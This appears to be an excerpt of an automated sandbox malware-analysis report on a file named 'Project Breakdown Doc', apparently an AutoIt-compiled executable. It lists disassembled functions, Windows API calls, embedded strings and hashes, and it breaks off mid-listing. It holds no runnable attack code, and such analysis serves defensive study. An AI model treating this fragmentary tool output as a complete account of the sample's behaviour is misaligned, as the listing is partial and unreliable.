                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: f2306249fcb0940935d3fbe8845c756824ae2d3778b4186bfacc586ee8c4a9dc
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 64C1503220519309DB7D467A94B413FBAE15BA27B331E076DECB2CB5D4EF20D624E620
                                                  Function 01783600 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction ID: 79d2c77fb9e01bb67bae698e787278ca355e31ba0d11c2700525c0b43efadafa
                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                  • Instruction Fuzzy Hash: 6C41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                  Function 017834F0 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction ID: b3a612bc2bcd283b6c7a7ac9cf27b0f3c08e91d44b460ebd76cd4e5faa602ecd
                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                  • Instruction Fuzzy Hash: B0019278A00109EFCB45EFA8C5909AEF7B5FB48710F208599D809A7701D730EE41DB90
                                                  Function 01783490 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction ID: ef7ebca6cf2a552c6290da6c74a1a6886b4b69600b694ce6d1305e5fbec267bd
                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                  • Instruction Fuzzy Hash: 79019278A00109EFCB45EF9CC5909AEF7B5FB48710F608599E809A7701D734EE41DB80
                                                  Function 01781E70 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                  Function 00CB7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00CB7B70
                                                  • DeleteObject.GDI32(00000000), ref: 00CB7B82
                                                  • DestroyWindow.USER32 ref: 00CB7B90
                                                  • GetDesktopWindow.USER32 ref: 00CB7BAA
                                                  • GetWindowRect.USER32(00000000), ref: 00CB7BB1
                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CB7CF2
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CB7D02
                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7D4A
                                                  • GetClientRect.USER32(00000000,?), ref: 00CB7D56
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CB7D90
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DB2
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DC5
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DD0
                                                  • GlobalLock.KERNEL32(00000000), ref: 00CB7DD9
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DE8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CB7DF1
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7DF8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00CB7E03
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7E15
                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CD2CAC,00000000), ref: 00CB7E2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00CB7E3B
                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CB7E61
                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CB7E80
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB7EA2
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB808F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: 342f260d774b5a88cd2cfde9eeb7170426f482c849d7f2af03a9a47869fc1951
                                                  • Instruction ID: cf9962d13f760ea82ed4ba56752e5532e4203bc86b978aeb5e01a0949ffd57db
                                                  • Opcode Fuzzy Hash: 342f260d774b5a88cd2cfde9eeb7170426f482c849d7f2af03a9a47869fc1951
                                                  • Instruction Fuzzy Hash: 2D022A71A00219EFDB14DFA4DD89FAE7BB9FB48310F148559F915AB2A1CB70AD01CB60
                                                  Function 00CC37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00CCF910), ref: 00CC38AF
                                                  • IsWindowVisible.USER32(?), ref: 00CC38D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: 56073eec9493f13c584a4269db20f512b67a2cfa53b7379db96d62bddf689569
                                                  • Instruction ID: c8f47c62fb4ebf7f081c6847f1613999b660ffc63bc253659fe91881e04c57f9
                                                  • Opcode Fuzzy Hash: 56073eec9493f13c584a4269db20f512b67a2cfa53b7379db96d62bddf689569
                                                  • Instruction Fuzzy Hash: FAD16F702043459BCB24EF11D495F6E7BA5EF94344F10855CF9966B3A2CB31EE0AEB82
                                                  Function 00CCA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00CCA89F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CCA8D0
                                                  • GetSysColor.USER32(0000000F), ref: 00CCA8DC
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00CCA8F6
                                                  • SelectObject.GDI32(?,?), ref: 00CCA905
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCA930
                                                  • GetSysColor.USER32(00000010), ref: 00CCA938
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00CCA93F
                                                  • FrameRect.USER32(?,?,00000000), ref: 00CCA94E
                                                  • DeleteObject.GDI32(00000000), ref: 00CCA955
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00CCA9A0
                                                  • FillRect.USER32(?,?,?), ref: 00CCA9D2
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCA9FD
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(00000012), ref: 00CCAB99
                                                    • Part of subcall function 00CCAB60: SetTextColor.GDI32(?,?), ref: 00CCAB9D
                                                    • Part of subcall function 00CCAB60: GetSysColorBrush.USER32(0000000F), ref: 00CCABB3
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(0000000F), ref: 00CCABBE
                                                    • Part of subcall function 00CCAB60: GetSysColor.USER32(00000011), ref: 00CCABDB
                                                    • Part of subcall function 00CCAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCABE9
                                                    • Part of subcall function 00CCAB60: SelectObject.GDI32(?,00000000), ref: 00CCABFA
                                                    • Part of subcall function 00CCAB60: SetBkColor.GDI32(?,00000000), ref: 00CCAC03
                                                    • Part of subcall function 00CCAB60: SelectObject.GDI32(?,?), ref: 00CCAC10
                                                    • Part of subcall function 00CCAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00CCAC2F
                                                    • Part of subcall function 00CCAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCAC46
                                                    • Part of subcall function 00CCAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00CCAC5B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: ea26351a81fc1dfb7237ce567fcb1ce77ecd030a76a839b91dc07e4af7c39236
                                                  • Instruction ID: acce15311d984d311d39dca057199d5269301c1f54872ff877b08d1a1011c2e5
                                                  • Opcode Fuzzy Hash: ea26351a81fc1dfb7237ce567fcb1ce77ecd030a76a839b91dc07e4af7c39236
                                                  • Instruction Fuzzy Hash: A8A17C72408305AFD7109F64DC08F6F7BAAFB88325F144A2DFAA2961E0D771D946CB52
                                                  Function 00C42C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00C42CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00C42CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00C42CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00C42CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00C42D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C7C68B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C7C6C4
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C7CAED
                                                    • Part of subcall function 00C41B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C42036,?,00000000,?,?,?,?,00C416CB,00000000,?), ref: 00C41B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00C7CB2A
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C7CB41
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C7CB57
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C7CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: bc0658838354070f8d0c06ab909cd1c6f66f2eee8540e93d5d1f03f4773ddf1c
                                                  • Instruction ID: 2405265303ef605cbd08a2cdeee3b429bd06b9e0c3bb0b6a0efb4ec8dfbe8502
                                                  • Opcode Fuzzy Hash: bc0658838354070f8d0c06ab909cd1c6f66f2eee8540e93d5d1f03f4773ddf1c
                                                  • Instruction Fuzzy Hash: 88128D30604202EFDB24CF24C8C5BA9BBE5BF45311F54856DF9A9DB262CB31E942DB91
                                                  Function 00CB77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00CB77F1
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CB78B0
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CB78EE
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CB7900
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CB7946
                                                  • GetClientRect.USER32(00000000,?), ref: 00CB7952
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CB7996
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB79A5
                                                  • GetStockObject.GDI32(00000011), ref: 00CB79B5
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00CB79B9
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CB79C9
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB79D2
                                                  • DeleteDC.GDI32(00000000), ref: 00CB79DB
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CB7A07
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CB7A1E
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CB7A59
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CB7A6D
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CB7A7E
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CB7AAE
                                                  • GetStockObject.GDI32(00000011), ref: 00CB7AB9
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CB7AC4
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CB7ACE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: e11345d94ed59b781836872566fbd8d909b8a052754d690ea4fcd8b47d2fc330
                                                  • Instruction ID: e798d187871d718959024094436cf6750058d9ee7b60213b0c33c78792fc8f63
                                                  • Opcode Fuzzy Hash: e11345d94ed59b781836872566fbd8d909b8a052754d690ea4fcd8b47d2fc330
                                                  • Instruction Fuzzy Hash: 0DA140B1A40215BFEB14DBA4DC4AFAE7BBAEB44710F004118FA15E72E0D7B4AD11CB64
                                                  Function 00CAAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00CAAF89
                                                  • GetDriveTypeW.KERNEL32(?,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB066
                                                  • SetErrorMode.KERNEL32(00000000,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB1C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: facdbe6ed014d655ca9a86338ed85b87feae4e77b3c4d6116abe4fb537593677
                                                  • Instruction ID: bf9dc511ca5ea9578e2a2325ed8ecaa181d526538616ad7872e9ec6affbef257
                                                  • Opcode Fuzzy Hash: facdbe6ed014d655ca9a86338ed85b87feae4e77b3c4d6116abe4fb537593677
                                                  • Instruction Fuzzy Hash: F751B57068430BAB8B04EB91CD92D7DB7B1FB563497204026F61EA7292C775AE41EB43
                                                  Function 00C46A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: dad984c2f894ecce2ca0f4826c9b48dd2aef8ee319fe622647b5862b123f2bc0
                                                  • Instruction ID: 40bb85ea51fa8f1daea39a6cea6d03b40f040574a956252090e2ac87446d75eb
                                                  • Opcode Fuzzy Hash: dad984c2f894ecce2ca0f4826c9b48dd2aef8ee319fe622647b5862b123f2bc0
                                                  • Instruction Fuzzy Hash: 85811971600245BBDB24ABA0CC82FAF7768FF16700F048165FD55AA1C6EB60DB45F2A2
                                                  Function 00CCAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00CCAB99
                                                  • SetTextColor.GDI32(?,?), ref: 00CCAB9D
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CCABB3
                                                  • GetSysColor.USER32(0000000F), ref: 00CCABBE
                                                  • CreateSolidBrush.GDI32(?), ref: 00CCABC3
                                                  • GetSysColor.USER32(00000011), ref: 00CCABDB
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCABE9
                                                  • SelectObject.GDI32(?,00000000), ref: 00CCABFA
                                                  • SetBkColor.GDI32(?,00000000), ref: 00CCAC03
                                                  • SelectObject.GDI32(?,?), ref: 00CCAC10
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCAC2F
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCAC46
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCAC5B
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCACA7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CCACCE
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00CCACEC
                                                  • DrawFocusRect.USER32(?,?), ref: 00CCACF7
                                                  • GetSysColor.USER32(00000011), ref: 00CCAD05
                                                  • SetTextColor.GDI32(?,00000000), ref: 00CCAD0D
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CCAD21
                                                  • SelectObject.GDI32(?,00CCA869), ref: 00CCAD38
                                                  • DeleteObject.GDI32(?), ref: 00CCAD43
                                                  • SelectObject.GDI32(?,?), ref: 00CCAD49
                                                  • DeleteObject.GDI32(?), ref: 00CCAD4E
                                                  • SetTextColor.GDI32(?,?), ref: 00CCAD54
                                                  • SetBkColor.GDI32(?,?), ref: 00CCAD5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: a55c2368595ff2b570465a916aab2dc1e55d61d0d690da4b03ecfa2470bf418a
                                                  • Instruction ID: bbec76a035e6ae6a4d5eca8fe1fb5de0ab5dfe6159a32d77a20d905f2e2518e7
                                                  • Opcode Fuzzy Hash: a55c2368595ff2b570465a916aab2dc1e55d61d0d690da4b03ecfa2470bf418a
                                                  • Instruction Fuzzy Hash: E2613C71900218EFDF119FA8DC48FAE7B7AFB08324F148129F915AB2A1D7759E41DB90
                                                  Function 00CC8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CC8D34
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC8D45
                                                  • CharNextW.USER32(0000014E), ref: 00CC8D74
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CC8DB5
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CC8DCB
